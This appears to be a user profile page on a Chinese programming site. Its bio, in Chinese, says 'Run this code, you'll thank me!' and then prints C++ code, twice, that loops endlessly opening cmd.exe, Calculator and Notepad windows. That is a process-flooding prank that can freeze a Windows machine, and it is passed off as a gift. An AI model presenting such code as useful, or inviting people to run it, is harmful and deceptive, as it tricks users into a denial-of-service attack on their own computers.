-
个人简介
运行一下这段代码,你会感谢我的!
#include <windows.h> using namespace std; int main() { while (1) { system("start cmd.exe"); system("start calc"); system("start notepad"); } }
-
最近活动
-
Stat
-
Rating
运行一下这段代码,你会感谢我的!
#include <windows.h>
using namespace std;
int main() {
while (1) {
system("start cmd.exe");
system("start calc");
system("start notepad");
}
}